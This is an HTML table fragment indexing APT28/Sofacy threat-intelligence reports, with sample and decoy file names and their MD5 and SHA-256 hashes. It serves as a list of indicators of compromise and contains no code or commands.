<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2014-10_TrendMicro Operation Pawn Storm</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">7FBB5A2E46FACD3EE0C945F324414210C2199FFB_Case5payload_saver.scr_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">c16b07f7590a8620a8f0f687b0bd8bd8</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">cb630234494f2424d8e158c6471f0b6d0643abbdf2f3e378bc2f68c9e7bca9eb</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2014-10_TrendMicro Operation Pawn Storm</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">88F7E271E54C127912DB4DB49E37D93AEA8A49C9_Case3_download_msmvs.exe_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">66f368cab3d5e64475a91f636c87af15</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">e8ac9acc6fa3283276bbb77cff2b54d963066659b65e48cd8803a2007839af25</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2014-10_TrendMicro Operation Pawn Storm</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">8DEF0A554F19134A5DB3D2AE949F9500CE3DD2CE_Case6_dropper_filee.dll_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">16a6c56ba458ec718b4e9bc8f9f10785</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">ce554d57333bdbccebb5e2e8d16a304947981e48ea2a5cc3d5f4ced7c1f56df3</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2014-10_TrendMicro Operation Pawn Storm</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">956D1A36055C903CB570890DA69DEABAACB5A18A_Case2_International Military.rtf_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">d994b9780b69f611284e22033e435edb</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">342e1f591ab45fcca6cee7f5da118a99dce463e222c03511c3f1288ac2cf82c8</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2014-10_TrendMicro Operation Pawn Storm</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">9C622B39521183DD71ED2A174031CA159BEB6479_Case3_conhost.dll__</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">d4e99548832b6999f00e8d223c6fabbd</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">d5debe5d88e76a409b9bc3f69a02a7497d333934d66f6aaa30eb22e45b81a9ab</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2014-10_TrendMicro Operation Pawn Storm</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">A8551397E1F1A2C0148E6EADCB56FA35EE6009CA_Case6_Coreshell.dll_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">48656a93f9ba39410763a2196aabc67f</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">c8087186a215553d2f95c68c03398e17e67517553f6e9a8adc906faa51bce946</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2014-10_TrendMicro Operation Pawn Storm</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">A90921C182CB90807102EF402719EE8060910345_Case4_APEC Media list 2013 Part1.xls_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">aeebfc9eb9031e423797a5af1985242d</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">e8d3f1e4e0d7c19e195d92be5cb6b3617a0496554c892e93b66a75c411745c05</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2014-10_TrendMicro Operation Pawn Storm</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">AC6B465A13370F87CF57929B7CFD1E45C3694585_Case4Payload_dw20.t_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">e1554b931affb3cd2edc90bc58028078</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">5ab8ef93fdeaac9af258845ab52c24d31140c8fffc5fdcf465529c8e00c508ac</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2014-10_TrendMicro Operation Pawn Storm</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">B3098F99DB1F80E27AEC0C9A5A625AEDAAB5899A_APEC Media list 2013 Part2.xls_decoy</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">bebb3675cfa4adaba7822cc8c39f55bf</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">8fc4fe966ef4e7ecf635283a6fa6bacd8586ee8f0d4d39c6faffd49d60b01cb9</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2014-10_TrendMicro Operation Pawn Storm</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">BC58A8550C53689C8148B021C917FB4AEEC62AC1_Case5Payload_install.exe_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">c43edb579e43aaeb6f0c0703f84e43f7</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">7dd063acdfb00509b3b06718b39ae53e2ff2fc080094145ce138abb1f2253de4</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2014-10_TrendMicro Operation Pawn Storm</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">C5CE5B7D10ACCB04A4E45C3A4DCF10D16B192E2F_Case1Payload_netids.dll_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">85c80d01661f88ec556579e772a5a3db</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">461f5340f9ea47344f86bb7302fbaaa0567605134ec880eef34fa9b40926eb70</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2014-10_TrendMicro Operation Pawn Storm</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">D0AA4F3229FCD9A57E9E4F08860F3CC48C983ADDml.rtf</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">a24d2f5258f8a0c3bddd1b5636b0ec57</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">992caa9e8de503fb304f97d1ab0b92202d2efb0d1353d19ce7bec512faf76491</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2014-10_TrendMicro Operation Pawn Storm</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">DAE7FAA1725DB8192AD711D759B13F8195A18821_Case6_MH17.doc_decoy</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">388594cd1bef96121be291880b22041a</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">adf344f12633ab0738d25e38f40c6adc9199467838ec14428413b1264b1bf540</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2014-10_TrendMicro Operation Pawn Storm</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">E338A57C35A4732BBB5F738E2387C1671A002BCB_Case6_advstoreshell.dll_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">d7a625779df56d874871bb632f3e3106</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">11097a7a3336e0ab124fa921b94e3d51c4e9e4424e140e96127bfcf1c10ef110</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2014-10_TrendMicro Operation Pawn Storm</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">F542C5F9259274D94360013D14FFBECC43AAE552_Case5Decoy_IDF_Spokesperson_Terror_Attack_011012.doc_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">77aa465744061b4b725f73848aebdff6</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">91f750f422fd3ff361fabca02901830ef3f6e5829f6e8db9c1f518a1a3cac08c</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2014-10_TrendMicro Operation Pawn Storm</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">wp-operation-pawn-storm.pdf</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">ce254486b02be740488c0ab3278956fd</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">9b8495ff1d023e3ae7aed799f02d9cf24422a38dfb9ed37c0bdc65da55b4ee42</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2015-07_Digital Attack on German Parliament</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2015-07_Digital Attack on German Parliament</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">0450AAF8ED309CA6BAF303837701B5B23AAC6F05_servicehost.dll_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">800af1c9d341b846a856a1e686be6a3e</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">566ab945f61be016bfd9e83cc1b64f783b9b8deb891e6d504d3442bc8281b092</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2015-07_Digital Attack on German Parliament</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">CDEEA936331FCDD8158C876E9D23539F8976C305_exe_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">5e70a5c47c6b59dae7faf0f2d62b28b3</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">730a0e3daf0b54f065bdd2ca427fbe10e8d4e28646a5dc40cbcfb15e1702ed9a</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2015-07_Digital Attack on German Parliament</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">Digital Attack on German Parliament_ Investigative Report on the Hack of the Left Party Infrastructure in Bundestag _ netzpolitik.pdf</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">28d4cc2a378633e0ad6f3306cc067c43</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">e83e2185f9e1a5dbc550914dcbc7a4d0f8b30a577ddb4cd8a0f36ac024a68aa0</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2015-07_Digital Attack on German Parliament</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">F46F84E53263A33E266AAE520CB2C1BD0A73354E_winexesvc.exe_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">77e7fb6b56c3ece4ef4e93b6dc608be0</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">5130f600cd9a9cdc82d4bad938b20cbd2f699aadb76e7f3f1a93602330d9997d</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2015-07_ESET_Sednit_meet_Hacking</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2015-07_ESET_Sednit_meet_Hacking</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">51B0E3CD6360D50424BF776B3CD673DD45FD0F97.exe_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">973e0c922eb07aad530d8a1de19c7755</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">7c4101caf833aa9025fec4f04a637c049c929459ad3e4023ba27ac72bde7638d</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2015-07_ESET_Sednit_meet_Hacking</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">B8B3F53CA2CD64BD101CB59C6553F6289A72D9BBdll_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">dcf6906a9a0c970bcd93f451b9b7932a</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">9a527274f99865a7d70487fe22e62f692f8b239d6cb80816b919734c7c741584</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2015-07_ESET_Sednit_meet_Hacking</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">D43FD6579AB8B9C40524CC8E4B7BD05BE6674F6C_warfsgfdydcikf.mkv.swf_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">557f8d4c6f8b386c32001def807dc715</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">84ad945d1ab58591efb21b863320f533c53b2398a1bc690d221e1c1c77fa27ff</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2015-07_Telus_Trojan-Downloader.Win32.Sofacy.B</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2015-07_Telus_Trojan-Downloader.Win32.Sofacy.B</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">B8B3F53CA2CD64BD101CB59C6553F6289A72D9BB.dll_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">dcf6906a9a0c970bcd93f451b9b7932a</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">9a527274f99865a7d70487fe22e62f692f8b239d6cb80816b919734c7c741584</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2015-09_Root9_APT28_Technical_Followup</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2015-09_Root9_APT28_Technical_Followup</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">0450AAF8ED309CA6BAF303837701B5B23AAC6F05_servicehost.dll_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">800af1c9d341b846a856a1e686be6a3e</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">566ab945f61be016bfd9e83cc1b64f783b9b8deb891e6d504d3442bc8281b092</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2015-09_Root9_APT28_Technical_Followup</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">CDEEA936331FCDD8158C876E9D23539F8976C305_exe_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">5e70a5c47c6b59dae7faf0f2d62b28b3</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">730a0e3daf0b54f065bdd2ca427fbe10e8d4e28646a5dc40cbcfb15e1702ed9a</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2015-09_Root9_APT28_Technical_Followup</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">F46F84E53263A33E266AAE520CB2C1BD0A73354E_winexesvc.exe_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">77e7fb6b56c3ece4ef4e93b6dc608be0</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">5130f600cd9a9cdc82d4bad938b20cbd2f699aadb76e7f3f1a93602330d9997d</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2015-09_SFecure_Sofacy-recycles-carberp-and-metasploit-code</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2015-09_SFecure_Sofacy-recycles-carberp-and-metasploit-code</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">Dlls</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">Dlls</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">21835AAFE6D46840BB697E8B0D4AAC06DEC44F5B</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">211b7100fd799e9eaabeb13cfa446231</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">3d13f2e5b241168005425b15410556bcf26d04078da6b2ef42bc0c2be7654bf8</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">Dlls</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">3B52046DD7E1D5684EABBD9038B651726714AB69</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">d535c3fc5f0f98e021bea0d6277d2559</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">d4525abc9dd2b7ab7f0c22e58a0117980039afdf15bed04bb0c637cd41fbfb9d</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">Dlls</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">5C3E709517F41FEBF03109FA9D597F2CCC495956</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">ac75fd7d79e64384b9c4053b37e5623f</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">0ac7b666814fd016b3d21d7812f4a272104511f90ca666fa13e9fb6cefa603c7</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">Dlls</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">7319A2751BD13B2364031F1E69035ACFC4FD4D18</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">c0d1762561f8c2f812d868a3939d23f0</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">8325cd6e26fb39cf7a08787e771a6cf708e0b45350d1ea239982af06db90804f</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">Dlls</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">9FC43E32C887B7697BF6D6933E9859D29581EAD0</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">a3c757af9e7a9a60e235d08d54740fbc</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">bf28267386a010197a50b65f24e815aa527f2adbc53c609d2b2a4f999a639413</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">Dlls</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">AC61A299F81D1CFF4EA857AFD1B323724AAC3F04</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">acf8cda38b0d1b6a0d3664a0e33deb96</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">638e7ca68643d4b01432f0ecaaa0495b805cc3cccc17a753b0fa511d94a22bdd</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">Dlls</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">B8B3F53CA2CD64BD101CB59C6553F6289A72D9BB</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">dcf6906a9a0c970bcd93f451b9b7932a</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">9a527274f99865a7d70487fe22e62f692f8b239d6cb80816b919734c7c741584</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">Dlls</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">D3AA282B390A5CB29D15A97E0A046305038DBEFE</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">18efc091b431c39d3e59be445429a7bc</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">eae782130b06d95f3373ff7d5c0977a8019960bdf80614c1aa7e324dc350428a</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">Dlls</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">D85E44D386315B0258847495BE1711450AC02D9F</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">c4ffab85d84b494e1c450819a0e9c7db</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">500fa112a204b6abb365101013a17749ce83403c30cd37f7c6f94e693c2d492f</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">Dlls</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">ED9F3E5E889D281437B945993C6C2A80C60FDEDC</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">2dfc90375a09459033d430d046216d22</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">261b0a5912965ea95b8ae02aae1e761a61f9ad3a9fb85ef781e62013d6a21368</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">Dlls</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">F7608EF62A45822E9300D390064E667028B75DEA</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">75f71713a429589e87cf2656107d2bfc</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">b6fff95a74f9847f1a4282b38f148d80e4684d9c35d9ae79fad813d5dc0fd7a9</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2015-09_SFecure_Sofacy-recycles-carberp-and-metasploit-code</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">Droppers</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">Droppers</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">015425010BD4CF9D511F7FCD0FC17FC17C23EEC1</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">c2a0344a2bbb29d9b56d378386afcbed</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">63d0b28114f6277b901132bc1cc1f541a594ee72f27d95653c54e1b73382a5f6</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">Droppers</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">4FAE67D3988DA117608A7548D9029CADDBFB3EBF</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">c6a80316ea97218df11e11125337233a</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">b0b3f0d6e6c593e2a2046833080574f98566c48a1eda865b2e110cd41bf31a31</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">Droppers</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">51B0E3CD6360D50424BF776B3CD673DD45FD0F97</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">973e0c922eb07aad530d8a1de19c7755</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">7c4101caf833aa9025fec4f04a637c049c929459ad3e4023ba27ac72bde7638d</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">Droppers</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">63D1D33E7418DAF200DC4660FC9A59492DDD50D9</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">2d4eaa0331abbc6d867f5f979b2c890d</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">b4f755c91c2790f4ab9bac4ee60725132323e13a2688f3d8939ae9ed4793d014</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">Droppers</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">B4A515EF9DE037F18D96B9B0E48271180F5725B7</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">afe09fb5a2b97f9e119f70292092604e</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">d93f22d46090bfc19ef51963a781eeb864390c66d9347e86e03bba25a1fc29c5</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">Droppers</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">B7788AF2EF073D7B3FB84086496896E7404E625E</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">eda061c497ba73441994a30e36f55b1d</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">b1800cb1d4b755e05b0fca251b8c6da96bb85f8042f2d755b7f607cbeef58db8</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">Droppers</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">B8AABE12502F7D55AE332905ACEE80A10E3BC399</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">91381cd82cdd5f52bbc7b30d34cb8d83</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">1a09ce8a9210d2530d6ce1d59bfae2ac617ac89558cdcdcac15392d176e70c8d</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">Droppers</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">F3D50C1F7D5F322C1A1F9A72FF122CAC990881EE</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">77089c094c0f2c15898ff0f021945148</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">eb6620442c3ab327f3ccff1cc6d63d6ffe7729186f7e8ac1dbbbfddd971528f0</td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2015-10_New Adobe Flash Zero-Day Used in Pawn Storm</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">APT28_2015-10_New Adobe Flash Zero-Day Used in Pawn Storm</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">2DF498F32D8BAD89D0D6D30275C19127763D5568763D5568.swf_</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">6ca857721be6fff26b10867c99bd8c80</td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;">b4064721d911e9606edf366173325945f9e940e489101e7d0747103c0e905126</td></tr>
